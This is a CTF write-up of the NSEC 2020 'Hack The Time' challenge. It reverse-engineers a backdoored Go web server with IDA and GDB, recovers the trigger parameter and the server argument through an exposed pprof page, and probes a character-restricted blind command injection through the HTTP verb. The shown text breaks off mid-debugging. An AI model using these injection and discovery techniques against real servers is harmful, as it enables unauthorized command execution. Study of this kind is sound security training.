Normal view

There are new articles available, click to refresh the page.
Before yesterdayBad Sector Labs Blog

Hack The Time - NSEC CTF 2020

By: Erik
19 May 2020 at 22:20

Overview

Note: This writeup and the challenge binary are available on GitHub.

This is a walk-through of "Hack The Time" a 4-point challenge from the 2020 NSEC CTF. It was a great challenge that required static analysis, dynamic analysis, web skills, Go knowledge, and some creative Bash foo to solve. This was team effort with help from two of my teammates (finding the arg and some bash foo).

Props to @becojo for a great challenge!

Challenge

Classes are sooooooo long and Im bored af. There is a rumour that the student that developped the service that controls
the schools clock added a backdoor to change the time. It is still running to this day It would be really cool if 
you can find it :wink:

I was able to get a copy of the binary if that helps you: https://dl.nsec/time_server [note binary included in this repo]

The school server is running at http://time-server.ctf:8080.

Solution

Web


Browsing to http://time-server.ctf:8080/ displays a simple clock with the current time.

The source of the page is below:

<!doctype html>
<html lang="en">
<head>
   <meta charset="UTF-8"/>
   <title>Document</title>
   <link href="/styles.css" rel="stylesheet"/>
</head>
<body>
   <div id="clock">
      <svg viewBox="0 0 40 40">
      <circle cx="20" cy="20" r="19" />
      <g class="marks">
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
         <line x1="15" y1="0" x2="16" y2="0" />
      </g>

      <line x1="0" y1="0" x2="9" y2="0" class="hour" />
      <line x1="0" y1="0" x2="13" y2="0" class="minute" />
      <line x1="0" y1="0" x2="16" y2="0" class="seconds" />
      <circle cx="20" cy="20" r="0.7" class="pin" />

      <text x="-3" y="0"></text>
      </svg>
   </div>

   <div id="time"></div>

   <script src="/script.js"></script>
</body>
</html>

/script.js:

async function main() {
    var res = await fetch('/time.json');
    var {0: j} = await res.json();

    document.querySelector('svg text').textContent = j;

    var svg = document.querySelector('svg');
    var date = new Date(Date.parse(j));

    svg.style.setProperty('--start-seconds', date.getSeconds());
    svg.style.setProperty('--start-minutes', date.getMinutes());
    svg.style.setProperty('--start-hours', date.getHours() % 12);
}

main();

setInterval(main, 5000);

This script fetches /time.json every 5 seconds. /time.json is an array of the current time, such as: ["2020-05-16 09:53:24"]

styles.css just contains CSS to make the clock. I don't have the original CSS due to how I solved the challenge and local testing.

That is the extent of the website; no obvious backdoors exposed. Let's look at the binary.

Static Analysis


Opening the binary in IDA Pro we see lots of go_ and net_http__ functions.

main.main

So we have a Go binary. It's a mess, but golang_loader_assist helps resolve function names and strings, and generally makes it a little more pleasant to work with.

You can see in the screenshot above of main.main there are two handlers being registered, /time.json and /, which makes sense given what we saw on the challenge site. There are no other handlers, so the backdoor isn't as easy as /cmd or similar.

Let's look at the /time.json handler (main_timeHandler)

timeHandler

It gets the current time (time_Now), formats it (time_Time_Format), coverts it to a string (runtime_convTstring), and finally prints it (fmt_Fprintf). Nothing jumps out as being a backdoor, so let's move on for now. We can come back and reverse engineer this function in more depth if we don't find anything else.

How about main_root the handler for /?

main_root

Nothing super interesting. Follow the rabbit hole down main_root_func1.

main_root_func1

Keep going into main_e

main_e

Well well well. net_http__Request_FormValue with a strange string mlaasdkfasldkfm. This feels like a backdoor. How can we send that string to have it read by FormValue? To the docs!

// FormValue returns the first value for the named component of the query.
// POST and PUT body parameters take precedence over URL query string values.
// FormValue calls ParseMultipartForm and ParseForm if necessary and ignores
// any errors returned by these functions.
// If key is not present, FormValue returns the empty string.
// To access multiple values of the same key, call ParseForm and
// then inspect Request.Form directly.

Since we know that / works with GET, we must have to send that string as "name component of the query" aka a GET parameter. The string will be the "key" and whatever it's value is will be returned by FormValue. Something like:

curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=test

Ok so that should get us to the jbe short loc_76320C test. What is that checking? Since this is a 64bit ELF, we can see if IDA's pseudocode helps any:

main_e_code

If something is <=1 it will panic, but we're not quite sure what that something is. Looking further to line 17, there are two checks against something related to os_Args (os_Args + 24 and os_Args +16). If all three of these checks pass, the program will call main_rr. Let's look at main_rr, with a mental note to come back and figure out what these checks are for.

main_rr

As soon as we see os_exec_Command:

there_it_is

At this point we're confident we have found the backdoor, but it looks like it has additional checks and it isn't obvious what those checks are for. It's time for dynamic analysis.

Dynamic Analysis


Before you start any GDB adventures with Go binaries, the Go documentation on GDB integration is required reading.

For this challenge my .gdbinit file contained the following:

source ~/peda/peda.py
set auto-load safe-path $debugdir:$datadir/auto-load:/usr/local/go/src/runtime
source /usr/local/go/src/runtime/runtime-gdb.py
set follow-fork-mode parent # this keeps GDB on the main binary if it forks any children (shells, etc)

I am using peda to make GDB a little more friendly.

Let's dig into the binary. First, get it open in GDB: gdb ./time_server

Now we load the function of interest and set a break point at it.

gdb-peda$ l main.e
16      in /app/main.go
gdb-peda$ b main.e
Breakpoint 1 at 0x763160: file /app/main.go, line 21.
gdb-peda$ r
Starting program: /mnt/hgfs/nsec/time/time_server 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff5b6d700 (LWP 33773)]
[New Thread 0x7ffff536c700 (LWP 33774)]
[New Thread 0x7ffff4b6b700 (LWP 33775)]
[New Thread 0x7fffeffff700 (LWP 33776)]
[New Thread 0x7fffef7fe700 (LWP 33777)]
[New Thread 0x7fffeeffd700 (LWP 33778)]

At this point the time_server is running and waiting for connections on port 8080. Based on our static analysis, we know it will look for a form value of mlaasdkfasldkfm but not sure what happens after. Let's find out! In a different terminal, send a request like so, using a dummy value of test for the form key discovered earlier:

$ curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=test
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> GET /?mlaasdkfasldkfm=test HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 

Now this request hangs open, as the time_server is paused at our break point. Switching back to the first terminal we see:

Thread 3 "time_server" hit Breakpoint 1, main.e (r=0xc000134500) at /app/main.go:21
21      in /app/main.go
gdb-peda$ 

Perfect, let's step forward to the values being loaded before the first comparison by disassembling main.e and setting a breakpoint at the mov before the cmp after the call to FormValue. Note: you may have to c (continue) a few times before breakpoint 2 hits.

gdb-peda$ disas main.e
Dump of assembler code for function main.e:
=> 0x0000000000763160 <+0>:     mov    rcx,QWORD PTR fs:0xfffffffffffffff8
   0x0000000000763169 <+9>:     cmp    rsp,QWORD PTR [rcx+0x10]
   0x000000000076316d <+13>:    jbe    0x76321a <main.e+186>
   0x0000000000763173 <+19>:    sub    rsp,0x30
   0x0000000000763177 <+23>:    mov    QWORD PTR [rsp+0x28],rbp
   0x000000000076317c <+28>:    lea    rbp,[rsp+0x28]
   0x0000000000763181 <+33>:    mov    rax,QWORD PTR [rsp+0x38]
   0x0000000000763186 <+38>:    mov    QWORD PTR [rsp],rax
   0x000000000076318a <+42>:    lea    rcx,[rip+0xd9133]        # 0x83c2c4
   0x0000000000763191 <+49>:    mov    QWORD PTR [rsp+0x8],rcx
   0x0000000000763196 <+54>:    mov    QWORD PTR [rsp+0x10],0xf
   0x000000000076319f <+63>:    call   0x6c3610 <net/http.(*Request).FormValue>
   0x00000000007631a4 <+68>:    mov    rax,QWORD PTR [rsp+0x20]
   0x00000000007631a9 <+73>:    mov    rcx,QWORD PTR [rsp+0x18]
   0x00000000007631ae <+78>:    mov    rdx,QWORD PTR [rip+0x3fa883]        # 0xb5da38 <os.Args+8>
   0x00000000007631b5 <+85>:    mov    rbx,QWORD PTR [rip+0x3fa874]        # 0xb5da30 <os.Args>
   0x00000000007631bc <+92>:    cmp    rdx,0x1
   0x00000000007631c0 <+96>:    jbe    0x76320c <main.e+172>
   0x00000000007631c2 <+98>:    mov    rdx,QWORD PTR [rbx+0x10]
   0x00000000007631c6 <+102>:   cmp    QWORD PTR [rbx+0x18],rax
   0x00000000007631ca <+106>:   je     0x7631d6 <main.e+118>
   0x00000000007631cc <+108>:   mov    rbp,QWORD PTR [rsp+0x28]
   0x00000000007631d1 <+113>:   add    rsp,0x30
   0x00000000007631d5 <+117>:   ret    
   0x00000000007631d6 <+118>:   mov    QWORD PTR [rsp],rcx
   0x00000000007631da <+122>:   mov    QWORD PTR [rsp+0x8],rdx
   0x00000000007631df <+127>:   mov    QWORD PTR [rsp+0x10],rax
   0x00000000007631e4 <+132>:   call   0x402dc0 <runtime.memequal>
   0x00000000007631e9 <+137>:   cmp    BYTE PTR [rsp+0x18],0x0
   0x00000000007631ee <+142>:   je     0x7631cc <main.e+108>
   0x00000000007631f0 <+144>:   mov    rax,QWORD PTR [rsp+0x38]
   0x00000000007631f5 <+149>:   mov    rcx,QWORD PTR [rax+0x8]
   0x00000000007631f9 <+153>:   mov    rax,QWORD PTR [rax]
   0x00000000007631fc <+156>:   mov    QWORD PTR [rsp],rax
   0x0000000000763200 <+160>:   mov    QWORD PTR [rsp+0x8],rcx
   0x0000000000763205 <+165>:   call   0x762fe0 <main.rr>
   0x000000000076320a <+170>:   jmp    0x7631cc <main.e+108>
   0x000000000076320c <+172>:   mov    eax,0x1
   0x0000000000763211 <+177>:   mov    rcx,rdx
   0x0000000000763214 <+180>:   call   0x460370 <runtime.panicIndex>
   0x0000000000763219 <+185>:   nop
   0x000000000076321a <+186>:   call   0x45da80 <runtime.morestack_noctxt>
   0x000000000076321f <+191>:   jmp    0x763160 <main.e>
End of assembler dump.
gdb-peda$ b *0x00000000007631ae
Breakpoint 2 at 0x7631ae: file /app/main.go, line 22.
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x1 
RCX: 0x0 
RDX: 0x0 
RSI: 0xc0001440ae ("asldkfm HTTP/1.1")
RDI: 0x83c2cc ("asldkfmms: gomaxprocs=negative offsetnegative updatenetwork is downno dot in fieldno medium foundno such processnon-minimal tagnot a directorynshortparallel;ntriangleright;num_symbols: 1\nrecord overfl"...)
RBP: 0xc00013cb40 --> 0xc00013cb80 --> 0xc00013cba8 --> 0xc00013cc08 --> 0xc00013cc38 --> 0xc00013cfb8 (--> ...)
RSP: 0xc00013cb18 --> 0xc000134500 --> 0xc0001440a0 ("GET /?mlaasdkfasldkfm HTTP/1.1")
RIP: 0x7631ae (<main.e+78>:     mov    rdx,QWORD PTR [rip+0x3fa883]        # 0xb5da38 <os.Args+8>)
R8 : 0x1 
R9 : 0x12 
R10: 0x8b5768 --> 0x807060504030201 
R11: 0x1 
R12: 0xffffffffffffffff 
R13: 0x12 
R14: 0x11 
R15: 0x200
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x76319f <main.e+63>:        call   0x6c3610 <net/http.(*Request).FormValue>
   0x7631a4 <main.e+68>:        mov    rax,QWORD PTR [rsp+0x20]
   0x7631a9 <main.e+73>:        mov    rcx,QWORD PTR [rsp+0x18]
=> 0x7631ae <main.e+78>:        mov    rdx,QWORD PTR [rip+0x3fa883]        # 0xb5da38 <os.Args+8>
   0x7631b5 <main.e+85>:        mov    rbx,QWORD PTR [rip+0x3fa874]        # 0xb5da30 <os.Args>
   0x7631bc <main.e+92>:        cmp    rdx,0x1
   0x7631c0 <main.e+96>:        jbe    0x76320c <main.e+172>
   0x7631c2 <main.e+98>:        mov    rdx,QWORD PTR [rbx+0x10]
[------------------------------------stack-------------------------------------]
0000| 0xc00013cb18 --> 0xc000134500 --> 0xc0001440a0 ("GET /?mlaasdkfasldkfm HTTP/1.1")
0008| 0xc00013cb20 --> 0x83c2c4 ("mlaasdkfasldkfmms: gomaxprocs=negative offsetnegative updatenetwork is downno dot in fieldno medium foundno such processnon-minimal tagnot a directorynshortparallel;ntriangleright;num_symbols: 1\nrecor"...)
0016| 0xc00013cb28 --> 0xf 
0024| 0xc00013cb30 --> 0x0 
0032| 0xc00013cb38 --> 0x0 
0040| 0xc00013cb40 --> 0xc00013cb80 --> 0xc00013cba8 --> 0xc00013cc08 --> 0xc00013cc38 --> 0xc00013cfb8 (--> ...)
0048| 0xc00013cb48 --> 0x7635ed (<main.root.func1+61>:  mov    rax,QWORD PTR [rsp+0x20])
0056| 0xc00013cb50 --> 0xc000134500 --> 0xc0001440a0 ("GET /?mlaasdkfasldkfm HTTP/1.1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 3 "time_server" hit Breakpoint 2, 0x00000000007631ae in main.e (r=0xc000134500) at /app/main.go:22
22      in /app/main.go
gdb-peda$ x/1x 0xb5da38
0xb5da38 <os.Args+8>:   0x0000000000000001
gdb-peda$ 

The last command run above examines 1 byte in hex at address 0xb5da38 and we see that it is 1. GDB with the help of the Go python script we sourced helpfully annotated this as os.Args+8. The Go docs describe os.Args as a string array that holds the command-line arguments, starting with the program name. The value we read that will be compared against 1 indicates that this is the length of os.Args which makes since, as we did not run it with any arguments. To validate this, we restart the program with an argument and re-issue the curl request.

gdb-peda$ kill
[Inferior 1 (process 33769) killed]
gdb-peda$ r testarg
Starting program: /mnt/hgfs/nsec/time/time_server testarg
---8<---snip---8<----
Thread 1 "time_server" hit Breakpoint 2, 0x00000000007631ae in main.e (r=0xc0000ea100) at /app/main.go:22
22      in /app/main.go
gdb-peda$ x/1x 0xb5da38
0xb5da38 <os.Args+8>:   0x0000000000000002

right.gif

Ok, so we can past the first comparison. What about the second? If we step a few instructions forward (si) to the next cmp we see this:

gdb-peda$ si
[----------------------------------registers-----------------------------------]
RAX: 0x4 
RBX: 0xc00009e020 --> 0x7fffffffe517 ("/mnt/hgfs/nsec/time/time_server")
RCX: 0x0 
RDX: 0x7fffffffe537 --> 0x67726174736574 ('testarg')
RSI: 0xc00001df8e ("asldkfm=test HTTP/1.1")
RDI: 0x83c2cc ("asldkfmms: gomaxprocs=negative offsetnegative updatenetwork is downno dot in fieldno medium foundno such processnon-minimal tagnot a directorynshortparallel;ntriangleright;num_symbols: 1\nrecord overfl"...)
RBP: 0xc000043b40 --> 0xc000043b80 --> 0xc000043ba8 --> 0xc000043c08 --> 0xc000043c38 --> 0xc000043fb8 (--> ...)
RSP: 0xc000043b18 --> 0xc0000ea400 --> 0xc000206e00 ("GET /?mlaasdkfasldkfm HTTP/1.1")
RIP: 0x7631c6 (<main.e+102>:    cmp    QWORD PTR [rbx+0x18],rax)
R8 : 0x1 
R9 : 0x0 
R10: 0x8b5768 --> 0x807060504030201 
R11: 0x1 
R12: 0xffffffffffffffff 
R13: 0x83 
R14: 0x82 
R15: 0x200
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7631bc <main.e+92>:        cmp    rdx,0x1
   0x7631c0 <main.e+96>:        jbe    0x76320c <main.e+172>
   0x7631c2 <main.e+98>:        mov    rdx,QWORD PTR [rbx+0x10]
=> 0x7631c6 <main.e+102>:       cmp    QWORD PTR [rbx+0x18],rax
   0x7631ca <main.e+106>:       je     0x7631d6 <main.e+118>
   0x7631cc <main.e+108>:       mov    rbp,QWORD PTR [rsp+0x28]
   0x7631d1 <main.e+113>:       add    rsp,0x30
   0x7631d5 <main.e+117>:       ret
[------------------------------------stack-------------------------------------]
0000| 0xc000043b18 --> 0xc0000ea400 --> 0xc000206e00 ("GET /?mlaasdkfasldkfm HTTP/1.1")
0008| 0xc000043b20 --> 0x83c2c4 ("mlaasdkfasldkfmms: gomaxprocs=negative offsetnegative updatenetwork is downno dot in fieldno medium foundno such processnon-minimal tagnot a directorynshortparallel;ntriangleright;num_symbols: 1\nrecor"...)
0016| 0xc000043b28 --> 0xf 
0024| 0xc000043b30 --> 0x0 
0032| 0xc000043b38 --> 0x0 
0040| 0xc000043b40 --> 0xc000043b80 --> 0xc000043ba8 --> 0xc000043c08 --> 0xc000043c38 --> 0xc000043fb8 (--> ...)
0048| 0xc000043b48 --> 0x7635ed (<main.root.func1+61>:  mov    rax,QWORD PTR [rsp+0x20])
0056| 0xc000043b50 --> 0xc0000ea400 --> 0xc000206e00 ("GET /?mlaasdkfasldkfm HTTP/1.1")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000007631c6      22      in /app/main.go
gdb-peda$ x/1x $rbx+0x18
0xc00000e0b8:   0x0000000000000007

The comparison is between $rbx+0x18 which is 7 and RAX which is 4, so we fail this check. How are the 7 and 4 being set? Looking at the values we control, testarg is 7 characters and test from the curl command is 4 characters. Seems like a safe bet these need to be equal in order to pass this check. In GDB we continue (c) to let the request finish, then fire another curl in the second terminal.

curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=testarg

Back in GDB we see:

[----------------------------------registers-----------------------------------]
RAX: 0x7 
---8<---snip---8<----
[-------------------------------------code-------------------------------------]
   0x7631bc <main.e+92>:        cmp    rdx,0x1
   0x7631c0 <main.e+96>:        jbe    0x76320c <main.e+172>
   0x7631c2 <main.e+98>:        mov    rdx,QWORD PTR [rbx+0x10]
=> 0x7631c6 <main.e+102>:       cmp    QWORD PTR [rbx+0x18],rax
   0x7631ca <main.e+106>:       je     0x7631d6 <main.e+118>
---8<---snip---8<----
Thread 1 "time_server" hit Breakpoint 5, 0x00000000007631c6 in main.e (r=0xc0000ca100) at /app/main.go:22
22      in /app/main.go
gdb-peda$ x/1x $rbx+0x18
0xc00000e0b8:   0x0000000000000007

Bingo, another check passed. Let's keep going by setting a breakpoint on the call to runtime.memequal.

gdb-peda$ b *0x00000000007631e4
Breakpoint 6 at 0x7631df: file /app/main.go, line 22.
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
RAX: 0x7 
RBX: 0xc00000e0a0 --> 0x7fffffffe53d ("/time_server")
RCX: 0xc00001c136 ("testarg HTTP/1.1")
RDX: 0x7fffffffe54a --> 0x67726174736574 ('testarg')
---8<---snip---8<----
[-------------------------------------code-------------------------------------]
   0x7631d6 <main.e+118>:       mov    QWORD PTR [rsp],rcx
   0x7631da <main.e+122>:       mov    QWORD PTR [rsp+0x8],rdx
   0x7631df <main.e+127>:       mov    QWORD PTR [rsp+0x10],rax
=> 0x7631e4 <main.e+132>:       call   0x402dc0 <runtime.memequal>
   0x7631e9 <main.e+137>:       cmp    BYTE PTR [rsp+0x18],0x0
   0x7631ee <main.e+142>:       je     0x7631cc <main.e+108>
   0x7631f0 <main.e+144>:       mov    rax,QWORD PTR [rsp+0x38]
   0x7631f5 <main.e+149>:       mov    rcx,QWORD PTR [rax+0x8]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xc0000d7b18 --> 0xc00001c136 ("testarg HTTP/1.1")
0008| 0xc0000d7b20 --> 0x7fffffffe54a --> 0x67726174736574 ('testarg')
0016| 0xc0000d7b28 --> 0x7 
---8<---snip---8<----

Looking at the stack we can make a safe bet that this is comparing the value of the FormValue with the first argument to time_server for 7 characters. Since they are equal, we should pass this check and finally get to our backdoor in main.rr. Let's set a breakpoint and find out.

gdb-peda$ l main.rr
7       in /app/main.go
gdb-peda$ b main.rr
Breakpoint 8 at 0x762fe0: file /app/main.go, line 12.
gdb-peda$ c
---8<---snip---8<----
Thread 1 "time_server" hit Breakpoint 6, main.rr (s=...) at /app/main.go:12
12      in /app/main.go

Excellent, we have successfully reached the backdoor code. What does it actually do? We saw in the static analysis a call to runtime_concatstring2 with the string echo (with the space) and then a call to os_exec_Command with the string bash involved. If we let the code run, we should see something echoed to the gdb terminal.

gdb-peda$ c
Continuing.
[Detaching after vfork from child process 37627]
GET

GET!?! That is not what I expected. The only place we have GET is in the HTTP request. It appears the backdoor will echo the HTTP verb if the form values are set correctly. Let's validate our hypothesis by sending a POST instead of a GET.

curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=testarg -X POST
$ gdb ./time_server 
---8<---snip---8<----
gdb-peda$ r testarg
Starting program: ./time_server testarg
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7ffff5b6d700 (LWP 37657)]
[New Thread 0x7ffff536c700 (LWP 37658)]
[New Thread 0x7ffff4b6b700 (LWP 37659)]
[New Thread 0x7fffeffff700 (LWP 37660)]
[New Thread 0x7fffef7fe700 (LWP 37661)]
[New Thread 0x7fffeeffd700 (LWP 37662)]
[Detaching after vfork from child process 37665]
POST

Confirmed. What we have so far is a few checks and then an echo of the HTTP verb from the request. Somehow, we need to use this to get a flag from the server. Let's review the checks first:

  1. Is the a form key of mlaasdkfasldkfm?
  2. Is there at least one argument to the server?
  3. Does the argument length equal the length of the value with the key mlaasdkfasldkfm?
  4. Does the argument match the value of the form with key mlaasdkfasldkfm?

If those 4 checks are passed, then we run bash -c echo [HTTP verb from request]. At this point we have two issues:

  1. What is the argument to the server binary on the challenge server?
  2. How do you read a flag value using only HTTP verb values?

Exploitation


First, we need to get the argument on the running challenge server. At this point one of my teammates posted in our chat:

chat: http://time-server.ctf:8080/debug/pprof/etc/services doesn't 404

He was using Ghidra, and when I posted the mlaasdkfasldkfm string in chat he searched for it.

ghidra search

Right clicking and copying the value in "String view" gives you a very large string that contains "/debug/pprof//etc/services" near the top.

pprof string

Browsing to http://time-server.ctf:8080/debug/pprof shows an interesting page. pprof is a Go standard library tool for profiling.

prof

The "cmdline" link looks especially interesting. What does it hold?

cmdline

Awesome! One issue solved.

teamwork

Now for how to read a flag from a server using an HTTP verb (or something that the server things is an HTTP verb) and bash. We know our verb is being passed to bash, so ideally we just send ;cat flag and get the flag. Remember however, that the echo is local to the server which makes our command injection blind. We'll have to figure out a way to get the output of the command, but first, what commands can we run? For this I just threw every character one at a time as the HTTP verb noting which characters caused the challenge to return a 400 Bad Request.

$ curl -v http://127.0.0.1:8080/?mlaasdkfasldkfm=testarg -X ':'
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> : /?mlaasdkfasldkfm=testarg HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 400 Bad Request
< Content-Type: text/plain; charset=utf-8
< Connection: close
< 
* Closing connection 0
400 Bad Request

After testing, I had the following list: ={}[]<>():;"\/ (a space is the last character in that list). That's pretty restrictive, as most everything we would want to do in bash would involve a slash and a space.

As a CTF participant and security researcher I've escaped my way out of a fair number of character restricted command injections, but this one really upped the difficulty. A common trick to get around space restriction is with input/output redirection (< and >) but those are restricted as well. ${IFS} is another favorite, but curly braces are restricted. We better hope the flag is in the current directory as / is restricted.

throwing a wrench

Footage of @becojo (the challenge designer) and me working on the challenge. I'm in the green shirt.

We do have some key characters available, specifically &, |, and `.

Let's take stock of our current status:

  1. We have no way of seeing the output of the command as it is local to the server
  2. We can pass arbitrary strings to bash -c echo with lots of restrictions

We know we are working with a webserver, and it's a safe bet to guess it is serving static files from somewhere. This could be the same directory as the time_server binary, or perhaps /var/www/html. If you've cloned the repository where this writeup lives you have the answer already, but assume you don't know. We have the binary, let's work through how to figure it out. We notice that running ./time_server locally fails to return any HTML and panics.

$ ./time_server 
2020/05/19 15:50:42 http: panic serving 127.0.0.1:59798: runtime error: index out of range [1] with length 1
goroutine 34 [running]:
net/http.(*conn).serve.func1(0xc00011e000)
        /usr/local/go/src/net/http/server.go:1767 +0x139
panic(0x806b60, 0xc0000fa060)
        /usr/local/go/src/runtime/panic.go:679 +0x1b2
main.e(0xc00013e000)
        /app/main.go:22 +0xb9
main.root.func1(0x8c89e0, 0xc0001060e0, 0xc00013e000)
        /app/main.go:29 +0x3d
net/http.HandlerFunc.ServeHTTP(0xc0000f60c0, 0x8c89e0, 0xc0001060e0, 0xc00013e000)
        /usr/local/go/src/net/http/server.go:2007 +0x44
net/http.(*ServeMux).ServeHTTP(0xb5e260, 0x8c89e0, 0xc0001060e0, 0xc00013e000)
        /usr/local/go/src/net/http/server.go:2387 +0x1bd
net/http.serverHandler.ServeHTTP(0xc000106000, 0x8c89e0, 0xc0001060e0, 0xc00013e000)
        /usr/local/go/src/net/http/server.go:2802 +0xa4
net/http.(*conn).serve(0xc00011e000, 0x8c9320, 0xc0000781c0)
        /usr/local/go/src/net/http/server.go:1890 +0x875
created by net/http.(*Server).Serve
        /usr/local/go/src/net/http/server.go:2928 +0x384

Let's look at main.main where the errors originate in GDB.

$ gdb ./time_server 
---8<---snip---8<----
gdb-peda$ l main.main
35      /app/main.go: No such file or directory.
gdb-peda$ disas main.main
Dump of assembler code for function main.main:
   0x00000000007633d0 <+0>:     mov    rcx,QWORD PTR fs:0xfffffffffffffff8
   0x00000000007633d9 <+9>:     cmp    rsp,QWORD PTR [rcx+0x10]
   0x00000000007633dd <+13>:    jbe    0x76359b <main.main+459>
   0x00000000007633e3 <+19>:    sub    rsp,0x60
   0x00000000007633e7 <+23>:    mov    QWORD PTR [rsp+0x58],rbp
   0x00000000007633ec <+28>:    lea    rbp,[rsp+0x58]
   0x00000000007633f1 <+33>:    lea    rax,[rip+0x6fe08]        # 0x7d3200
   0x00000000007633f8 <+40>:    mov    QWORD PTR [rsp],rax
   0x00000000007633fc <+44>:    call   0x40e370 <runtime.newobject>
   0x0000000000763401 <+49>:    mov    rax,QWORD PTR [rsp+0x8]
   0x0000000000763406 <+54>:    mov    QWORD PTR [rsp+0x40],rax
   0x000000000076340b <+59>:    lea    rcx,[rip+0x15f88e]        # 0x8c2ca0 <go.itab.net/http.Dir,net/http.FileSystem>
   0x0000000000763412 <+66>:    mov    QWORD PTR [rax],rcx
   0x0000000000763415 <+69>:    lea    rcx,[rip+0x156504]        # 0x8b9920
   0x000000000076341c <+76>:    mov    QWORD PTR [rax+0x8],rcx
---8<---snip---8<----

That http.FileSystem looks interesting. Set a breakpoint on it and continue.

gdb-peda$ b *0x000000000076340b
Breakpoint 1 at 0x76340b: file /usr/local/go/src/net/http/fs.go, line 716.
gdb-peda$ r testarg
Starting program: /mnt/hgfs/nsec/time/time_server testarg
---8<---snip---8<----
[----------------------------------registers-----------------------------------]
RAX: 0xc0000fa0f0 --> 0x0 
RBX: 0x0 
RCX: 0x7ffff7d8f6d0 --> 0x79055 
RDX: 0x79055 
RSI: 0x10 
RDI: 0x10 
RBP: 0xc000101f50 --> 0xc000101f58 --> 0x4321be (<runtime.main+542>:    mov    eax,DWORD PTR [rip+0x74895c]        # 0xb7ab20 <runtime.runningPanicDefers>)
RSP: 0xc000101ef8 --> 0x7d3200 --> 0x10 
RIP: 0x76340b (<main.main+59>:  lea    rcx,[rip+0x15f88e]        # 0x8c2ca0 <go.itab.net/http.Dir,net/http.FileSystem>)
R8 : 0x12 
R9 : 0x12 
R10: 0x8b5769 --> 0x908070605040302 
R11: 0x1 
R12: 0xffffffffffffffff 
R13: 0x10 
R14: 0xf 
R15: 0x200
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7633fc <main.main+44>:     call   0x40e370 <runtime.newobject>
   0x763401 <main.main+49>:     mov    rax,QWORD PTR [rsp+0x8]
   0x763406 <main.main+54>:     mov    QWORD PTR [rsp+0x40],rax
=> 0x76340b <main.main+59>:     lea    rcx,[rip+0x15f88e]        # 0x8c2ca0 <go.itab.net/http.Dir,net/http.FileSystem>
   0x763412 <main.main+66>:     mov    QWORD PTR [rax],rcx
   0x763415 <main.main+69>:     lea    rcx,[rip+0x156504]        # 0x8b9920
   0x76341c <main.main+76>:     mov    QWORD PTR [rax+0x8],rcx
   0x763420 <main.main+80>:     nop
[------------------------------------stack-------------------------------------]
0000| 0xc000101ef8 --> 0x7d3200 --> 0x10 
0008| 0xc000101f00 --> 0xc0000fa0f0 --> 0x0 
0016| 0xc000101f08 --> 0xc000000180 --> 0xc000100000 --> 0xc000102000 --> 0x0 
0024| 0xc000101f10 --> 0xc000101f50 --> 0xc000101f58 --> 0x4321be (<runtime.main+542>:  mov    eax,DWORD PTR [rip+0x74895c]        # 0xb7ab20 <runtime.runningPanicDefers>)
0032| 0xc000101f18 --> 0x40714f (<runtime.closechan+479>:       jmp    0x40716e <runtime.closechan+510>)
0040| 0xc000101f20 --> 0xc000086058 --> 0x0 
0048| 0xc000101f28 --> 0x0 
0056| 0xc000101f30 --> 0x0 
[------------------------------------------------------------------------------]

Hmm nothing obvious yet. Step forward a few instructions.

gdb-peda$ ni # a few of these
[----------------------------------registers-----------------------------------]
RAX: 0xc0000fa0f0 --> 0x8c2ca0 --> 0x7cc380 --> 0x10 
RBX: 0x0 
RCX: 0x8b9920 --> 0x8383c4 ("static/stoppedsubdot;subset;subsim;subsub;subsup;succeq;supdot;supset;supsim;supsub;supsup;swarhk;swnwar;syscalltarget;tcaron;tcedil;telrec;there4;thetav;thinsp;thksim;timesb;timesd;topbot;topcir;tpri"...)
RDX: 0x79055 
RSI: 0x10 
RDI: 0x10 
RBP: 0xc000101f50 --> 0xc000101f58 --> 0x4321be (<runtime.main+542>:    mov    eax,DWORD PTR [rip+0x74895c]        # 0xb7ab20 <runtime.runningPanicDefers>)
RSP: 0xc000101ef8 --> 0x7d3200 --> 0x10 
RIP: 0x76341c (<main.main+76>:  mov    QWORD PTR [rax+0x8],rcx)
R8 : 0x12 
R9 : 0x12 
R10: 0x8b5769 --> 0x908070605040302 
R11: 0x1 
R12: 0xffffffffffffffff 
R13: 0x10 
R14: 0xf 
R15: 0x200
EFLAGS: 0x216 (carry PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
